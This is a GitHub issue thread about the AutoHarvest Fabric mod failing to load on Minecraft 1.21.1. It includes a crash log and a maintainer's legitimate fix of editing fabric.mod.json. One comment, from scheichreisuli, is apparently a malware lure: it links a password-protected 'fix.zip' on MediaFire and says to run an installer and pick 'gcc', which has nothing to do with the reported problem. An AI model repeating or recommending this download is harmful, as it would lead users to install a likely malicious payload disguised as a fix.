### ISSUE TITLE
1.21.1 support

### ISSUE THREAD

**Issue by SAJewers** [Sz-Yuan/AutoHarvset#2]
attempting to run on 1.21.1 gives this error:
> Incompatible mods found!
> net.fabricmc.loader.impl.FormattedException: Some of your mods are incompatible with the game or each other!
> A potential solution has been determined, this may resolve your problem:
> 	 - Replace mod 'AutoHarvest' (autoharvest) 1.1 with any version that is compatible with:
> 		 - minecraft 1.21.1
> More details:
> 	 - Mod 'AutoHarvest' (autoharvest) 1.1 requires version 1.21 of 'Minecraft' (minecraft), but only the wrong version is present: 1.21.1!
> 	at net.fabricmc.loader.impl.FormattedException.ofLocalized(FormattedException.java:51)
> 	at net.fabricmc.loader.impl.FabricLoaderImpl.load(FabricLoaderImpl.java:196)
> 	at net.fabricmc.loader.impl.launch.knot.Knot.init(Knot.java:146)
> 	at net.fabricmc.loader.impl.launch.knot.Knot.launch(Knot.java:68)
> 	at net.fabricmc.loader.impl.launch.knot.KnotClient.main(KnotClient.java:23)
> 	at org.prismlauncher.launcher.impl.StandardLauncher.launch(StandardLauncher.java:100)
> 	at org.prismlauncher.EntryPoint.listen(EntryPoint.java:129)
> 	at org.prismlauncher.EntryPoint.main(EntryPoint.java:70)
>

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sz-Yuan** [comment]
The version 1.21 and 1.21.1 are compatible; you just need to change the 'depends' option for 'minecraft' from 1.21 to 1.21.1 in the 'fabric.mod.json' file inside the .jar file. You can use a decompression software to open the .jar file.
